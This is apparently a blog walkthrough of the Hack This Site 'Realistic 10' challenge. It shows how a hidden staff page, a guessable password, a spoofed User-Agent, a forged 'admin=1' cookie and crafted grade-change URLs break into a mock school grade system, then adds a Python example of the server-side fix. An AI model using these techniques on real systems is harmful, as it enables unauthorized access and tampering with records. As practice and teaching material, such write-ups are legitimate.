What is it? @.@

Here is the place where I record some tactics about wargames, systems, and other security issues.

2012-10-09

Hack This Site! - Realistic 10

Description:
Holy Word High School
You get to do what every hacker has dreamed of, breaking in and changing grades! Help Zach get his grades fixed, and prove you're as "skilled" as he thinks you are. 

Level 10
From: Zach Sanchez 

Message: hey man, it's me Zach, I need a favour from you, I'm in big trouble.
if you'll remember, I go to that super uptight religious school. well, two of my teachers are failing me because my lifestyle does not fall in line with their moralistic rules for public behaviour. My gym teacher even called me a 'long-haired hippie faggot'! And if I fail any classes, I won't graduate.
Listen, can you hack into the school's grade database and make it so I'm passing all my classes? I know they have this system set up on their website that allows teachers to submit grades and stuff, and I heard you pulled a few things in the past as well. Their web master was not thinking in terms of computer security when he was designing the website, so it might be easy. Or not. Please check it out here. The username to my account is 'Zach Sanchez' and my password is 'liberty638'. Thanks man!

Solution:
  1. Take a tour of the website.
  2. On the front page, you'll see there's a hidden link at the bottom of the left sidebar image:
    <td width=150 valign="top">
        <img src="side.jpg" width=150 height=414>
        <br />
        <a href="staff.php">
            <img src="nothing.gif" width=150 height=20 border=0>
        </a>
    </td>
  3. Visit the page, and there's a login form for teachers.
    Visit: hxxp://www.hackthissite.org/missions/realistic/10/staff.php

    Please enter your login information to continue
    username
    _____________
    |____________|
    password
    _____________
    |____________|
    log in
  4. Since the 'Staff Listing' page lists every teacher's information, including their e-mail address, we can gather candidate account names from that page. Remember that at many schools the e-mail account name is also the account name for the website or other platforms.
  5. I tried every teacher's e-mail account to log in to the staff.php page. It's annoying. Finally, I found out that Mrs. Samantha Miller uses her account name as her password.
  6. After you log in, you will see a message:
    Welcome, Mrs. Samantha Miller! Please remember that access to the staff administration area is restricted to the district-supplied 'holy_teacher' web browser.
  7. So we need the 'holy_teacher' web browser to access the page. But the server can only tell which browser is in use from the User-Agent string in the HTTP request header, so modifying that header achieves the same goal.
  8. I use Chrome Developer Tools to override the User-Agent.
  9. Revisit the staff page. A control panel shows up now, but because of our restricted privileges we still cannot modify anything:
    (note: you are not an administrator so you cannot change grades)
  10. Check the cookies: there is a cookie named 'admin' and its value is zero. Use the code below to modify it, then refresh the page.
    javascript:document.cookie="admin=1";
  11. Now you can click the 'Change Grades' button and view Zach Sanchez's grades. However, the system shows a message saying that it is too late to change grades:
    Sorry, it is too late into the school year to change grades now. The grades will be printed and mailed in just a few days.
  12. View the page source again. You'll find that every row has an HTML form to change its value, and only the submit button is commented out:

    <tr><td>
    <form action="staff.php?action=changegrades&amp;changeaction=modrec&amp;rec=4&amp;studentid=1" method="post"></form>
    Bible study</td><td width="5">&nbsp;</td>
    <td><input type="text" name="grade" value="2" size="4"></td><td width="5">&nbsp;</td>
    <td><input type="text" name="comments" value="Disruptful in class."></td><td width="5">&nbsp;</td><td>
    <center>1</center></td><td width="5">&nbsp;</td><td>
    <!--<input type="submit" value="modify"></form>-->see below</td>
    </tr>
  13. The two subjects Zach is failing are Bible study and Gym in semester 2. Use URLs like the ones below to send requests that modify the grades and comments.
    Bible study :
    staff.php?action=changegrades&changeaction=modrec&rec=0&studentid=1&grade=5&comments=Does%20well

    Gym :
    staff.php?action=changegrades&changeaction=modrec&rec=3&studentid=1&grade=5&comments=Does%20well
  14. Good Job, OOXXOOXX, You have successfully completed Mission 10
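The two access checks defeated in steps 7 to 10 both trust values the client sends (the User-Agent header and an 'admin' cookie). The following is an added example, not code from the challenge or this writeup, that models that flawed check next to a hardened one where the role lives in server-side session state; the Request and SessionStore shapes and the account names are assumptions made for the example.

```python
import secrets
from dataclasses import dataclass, field

@dataclass
class Request:
    """Minimal model of an HTTP request (constructed for this example)."""
    headers: dict
    cookies: dict

def can_change_grades_vulnerable(req: Request) -> bool:
    """Authorization as the challenge site behaves in steps 7 to 10: User-Agent
    and the 'admin' cookie are both chosen by the client, so neither is a control."""
    browser_ok = req.headers.get("User-Agent", "").startswith("holy_teacher")
    is_admin = req.cookies.get("admin") == "1"
    return browser_ok and is_admin

@dataclass
class SessionStore:
    """Server-side session state: the client only ever holds an opaque id."""
    sessions: dict = field(default_factory=dict)

    def login(self, username: str, role: str) -> str:
        # The role is decided by the server at login and never leaves it.
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": username, "role": role}
        return sid

    def role_for(self, req: Request):
        return self.sessions.get(req.cookies.get("sid"), {}).get("role")

def can_change_grades_fixed(req: Request, store: SessionStore) -> bool:
    """Hardened check: only server-held state matters; User-Agent and extra cookies are ignored."""
    return store.role_for(req) == "admin"

def demo() -> dict:
    """Runs both checks against constructed requests; every value should be True."""
    store = SessionStore()
    teacher_sid = store.login("smiller", "teacher")  # constructed accounts
    admin_sid = store.login("principal", "admin")
    forged = Request({"User-Agent": "holy_teacher/1.0"}, {"admin": "1"})
    tampered = Request({"User-Agent": "holy_teacher/1.0"},
                       {"sid": teacher_sid, "admin": "1"})
    admin_req = Request({"User-Agent": "Mozilla/5.0"}, {"sid": admin_sid})
    return {
        "vulnerable_accepts_forged": can_change_grades_vulnerable(forged),
        "fixed_rejects_forged": not can_change_grades_fixed(forged, store),
        "fixed_ignores_admin_cookie": not can_change_grades_fixed(tampered, store),
        "fixed_allows_real_admin": can_change_grades_fixed(admin_req, store),
    }
```

The same server-side check has to run inside the grade-modification handler itself, since commenting out the submit button (step 12) leaves the endpoint fully reachable.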